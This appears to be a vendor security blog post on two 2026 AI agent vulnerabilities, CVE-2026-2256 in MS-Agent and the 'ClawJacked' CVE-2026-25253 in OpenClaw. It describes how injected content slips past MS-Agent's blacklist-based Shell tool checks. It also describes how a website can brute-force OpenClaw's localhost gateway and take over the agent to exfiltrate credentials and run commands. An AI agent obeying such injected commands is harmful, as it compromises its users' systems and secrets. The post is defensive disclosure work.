In the same week that Google patched CVE-2026-0628 in Chrome's Gemini panel, two separate research disclosures landed that together make a stark case about the state of AI agent security in early 2026. Both involved widely-used AI agent frameworks. Both gave attackers the ability to execute arbitrary commands on the host system. Both were exploited through fundamentally the same underlying mechanism — a language model that cannot distinguish between legitimate instructions and adversarially injected ones.
The frameworks are MS-Agent and OpenClaw. The vulnerabilities are CVE-2026-2256 and CVE-2026-25253, respectively. If your engineering organization uses either framework — or any AI agent framework with system-level access — these disclosures have direct implications for your security posture.
CVE-2026-2256: MS-Agent's Shell Tool as an Attack Vector
Discoverer: Itamar Yochpaz | Disclosure: CERT/CC advisory VU#431821
Status at disclosure: Vendor had not responded during CERT/CC coordination. No official patch available.
MS-Agent is an open-source framework from ModelScope for creating AI agents capable of generating code, analyzing data, and interacting with system tools. It is based on MCP (Model Calling Protocol) and gives agents a Shell tool — the ability to execute OS commands on the host system as part of their normal operation.
The root cause is straightforward: MS-Agent's Shell tool does not properly sanitize input before passing it to the OS for execution. The tool does implement a check function — six validation layers — but those layers use a regex-based blacklist pattern to filter dangerous commands. This is a known unsafe pattern. Blacklist-based filtering can be bypassed by:
- Command obfuscation and character substitution
- Alternative syntax achieving the same effect through different paths
- Encoding variations (URL encoding, Unicode equivalents, base64-embedded commands)
- Unanticipated input structures the blacklist did not anticipate
An attacker who can influence what content MS-Agent processes — through a crafted document, malicious code in the agent's context, a manipulated data source — can inject commands that survive all six validation layers and execute on the host with the full privileges of the MS-Agent process. Successful exploitation enables:
- Reading API keys, tokens, and configuration files
- Dropping payloads and establishing persistent footholds
- Pivoting to internal services and adjacent systems
- Injecting input into build outputs, reports, or files consumed downstream
At the time of SecurityWeek's disclosure, the vendor had not responded during CERT/CC coordination efforts. There is no official patch. Organizations using MS-Agent are currently operating with an unpatched CVSS 9.8 vulnerability.
CVE-2026-25253: ClawJacked — Any Website as an Attack Vector
Discoverer: Oasis Security | Fix: OpenClaw version 2026.2.25 — shipped within 24 hours of disclosure.
Note: With OpenClaw's massive adoption footprint, organizations should assume unpatched instances exist across developer fleets.
OpenClaw is a self-hosted AI agent that has become the fastest-growing open-source project in GitHub's history, reaching over 100,000 stars in less than a week after launch. It runs locally on developer machines, integrates with messaging apps, calendars, and developer tools, and takes autonomous actions on the user's behalf — sending emails, executing shell commands, reading files, managing workflows.
The ClawJacked vulnerability is architecturally different from the MS-Agent flaw but equally severe. It does not require prompt injection or malicious content in the agent's data pipeline. It requires only that the developer, running OpenClaw in the background, visits any attacker-controlled website in their browser.
Three Cascading Flawed Assumptions
OpenClaw's gateway is a local WebSocket server binding to localhost, built on three assumptions that turned out to be wrong:
- Assumption: localhost connections are inherently trustworthy.
Reality: browsers permit JavaScript on any website to silently open WebSocket connections to loopback addresses without triggering any browser warning or user prompt. - Assumption: rate limiters prevent brute-force attacks.
Reality: the rate limiter completely exempted loopback connections — failed authentication attempts were not counted, throttled, or logged. An attacker connecting from localhost faced zero rate limiting. - Assumption: device pairing requires user intent.
Reality: the gateway automatically approved device pairings from localhost without requiring user confirmation.
The consequence: a malicious website's JavaScript could silently open a connection, brute-force the gateway password at hundreds of attempts per second (a common password list is exhausted in under a second), register as a trusted device without any user prompt, and gain full admin-level control of the agent.
"In practice, this means an attacker could instruct the agent to search the developer's Slack history for API keys, read private messages, exfiltrate files from connected devices, or execute arbitrary shell commands on any paired node. For a developer with typical OpenClaw integrations, this is equivalent to full workstation compromise, initiated from a browser tab." — Oasis Security
The Common Thread: Agents with System Access, Insufficient Trust Boundaries
Reading CVE-2026-2256 and CVE-2026-25253 alongside CVE-2026-0628 from the same week, a pattern emerges that every organization deploying AI agents needs to internalize.
AI agents that take autonomous actions — executing shell commands, reading files, managing credentials, calling APIs — have a blast radius that scales with their capability. A language model that can only generate text has limited exposure when compromised. An agent that can execute arbitrary OS commands, exfiltrate files, read credentials, and pivot to adjacent systems has the blast radius of a privileged system account.
The MS-Agent vulnerability is a classic injection flaw — the same category as SQL injection and command injection — applied to the interface between a language model and a system shell. The fix is architectural: strict allowlists that permit only specific, pre-approved commands; sandboxing that limits what a compromised agent process can reach; least-privilege execution that bounds the damage of a successful injection.
The OpenClaw vulnerability is a trust boundary failure. The gateway trusted localhost, but localhost was reachable by untrusted content — any website in the developer's browser. Local does not mean safe. Rate limiting needs to apply regardless of connection origin. Device pairings require explicit user confirmation, always.
Both failures are detectable before deployment with the right evaluation tools. Static analysis of AI integration code paths — specifically the interfaces between model outputs and system execution — surfaces command injection vectors and trust boundary failures before they reach production. Both the MS-Agent Shell tool's blacklist-based filtering and the gateway's implicit localhost trust were findable without running the code.
The Shadow AI Dimension
There is a layer to the OpenClaw story that the technical vulnerability disclosure underplays. At the time of the ClawJacked disclosure, OpenClaw had already become the most starred project in GitHub history — adopted by developers at organizations across every industry in a matter of weeks, often without IT or security team visibility.
For many organizations, OpenClaw installations represent a growing category of shadow AI: developer-adopted tools that operate outside IT's visibility, often with broad access to local systems and credentials, and no centralized governance. The ClawJacked vulnerability could be present on developer machines that the organization's security team does not know are running OpenClaw at all.
Out of 10,700 skills on ClawHub — OpenClaw's community marketplace — researchers at Koi Security found that more than 820 were malicious, a sharp increase from 324 discovered just weeks prior. Trend Micro found threat actors using 39 malicious skills to distribute the Atomic macOS information stealer. The supply chain problem extends beyond the framework itself to the ecosystem of community-contributed capabilities.
The governance implication is direct: AI agents need to be inventoried, governed, and monitored with the same rigor as any other privileged software on the network. That means knowing which AI agent frameworks are running on developer machines, what credentials and capabilities those agents have been granted, and whether those agents are being monitored for anomalous behavior.
References
- CVE-2026-2256 — CERT/CC VU#431821, disclosed March 2026
- SecurityWeek, Vulnerability in MS-Agent AI Framework Can Allow Full System Compromise, March 2026
- CVE-2026-25253 — Oasis Security, ClawJacked: OpenClaw Vulnerability Enables Full Agent Takeover, February 26, 2026
- SecurityWeek, OpenClaw Vulnerability Allowed Websites to Hijack AI Agents, March 2026
- Dark Reading, Critical OpenClaw Vulnerability Exposes AI Agent Risks, March 2026
- AptaSentry Products — Model Security & Code Scanning